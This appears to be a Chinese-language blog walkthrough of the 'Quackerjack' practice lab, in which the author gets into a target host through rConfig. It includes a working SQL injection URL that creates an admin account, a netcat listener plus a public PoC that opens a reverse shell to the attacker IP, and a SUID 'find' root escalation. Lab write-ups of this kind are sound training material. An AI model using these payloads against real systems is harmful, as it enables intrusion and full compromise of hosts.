Quackerjack

04410
Quackerjack-白鸢的笔记
Quackerjack
此内容为付费阅读,请付费后查看
9999999999999
立即购买
您当前未登录!建议登陆后购买,可保存购买订单
付费阅读

简介

point 10

CTF-200-06

Difficulty INTERMEDIATE

rated by community INTERMEDIATE

 

No duck hunting here, but open your eyes carefully like a true hunter

 

实验环境

攻击者 Kali 192.168.45.201

受害者 IP 192.168.214.57  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 192.168.214.57

21/tcp open ftp vsftpd 3.0.2

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)

111/tcp open rpcbind 2-4 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: SAMBA)

445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)

3306/tcp open mysql MariaDB (unauthorized)

8081/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)

 

2. 漏洞发现和利用

发现80端口是测试页面 没有用

看一下smb有没有什么共享文件

smbclient -L ///192.168.214.57//

没有收获

 

只能看一下8081端口

是一个登录页面

2024-04-05_17-56

2024-04-05_17-57

 

Google发现这个版本有两个漏洞 一个是SQL注入和远程代码执行(RCE)

 

看这个页面我就尝试SQL注入

经过查找

https://github.com/mauricerizat/rConfig-3.9.4-SQL-injection-for-creating-admin-user

这个里面很有用的URL

https://192.168.214.57:8081/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command ;INSERT INTO `users` (`id`, `username`, `password`, `userid`, `userlevel`, `email`, `timestamp`, `status`) VALUES ('450', 'apple', '1f3870be274f6c49b3e31a0c6728957f', '6c97424dc92f14ae78f8cc13cd08308d', 9, 'apple@domain.com', 1346920339, 1);--

这个输入后 就会自动生成apple:apple的登录用户

 

回到登录页面 尝试登录

2024-04-05_18-01

成功登录

 

我们继续看看RCE漏洞怎么使用

https://github.com/v1k1ngfr/exploits-rconfig/tree/master

 

首先kali监听445端口(很多其他端口无法使用 我怀疑是FW没有放行)

nc -lvnp 445

之后运行POC

python3 rconfig_CVE-2019-19509.py https://192.168.214.57:8081/ apple apple 192.168.45.201 445

就拿到了shell

 

3. 后渗透阶段

很简单的提权

查看suid

find / -user root -perm -4000 2>/dev/null -exec ls -l {} \;

2024-04-05_18-04

很明显find提权

/usr/bin/find /usr/bin/su -exec /bin/sh -p \;

其中find和su都是拥有suid权限

2024-04-05_18-05

成功提权

 

 

总结

学到了rConfig两种漏洞

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Offensive Security PG Practise
喜欢就支持一下吧
点赞10 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
Exfiltrated-白鸢的笔记
Exfiltrated
Exfiltrated
1年前 92
Flimsy-白鸢的笔记
Flimsy
Flimsy
1年前 91
LaVita-白鸢的笔记
LaVita
LaVita
1年前 85
Jacko-白鸢的笔记
Jacko
Jacko
1年前 83
DepthB2R SSH远程代码执行-白鸢的笔记
DepthB2R SSH远程代码执行
DepthB2R SSH远程代码执行
1年前 76
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片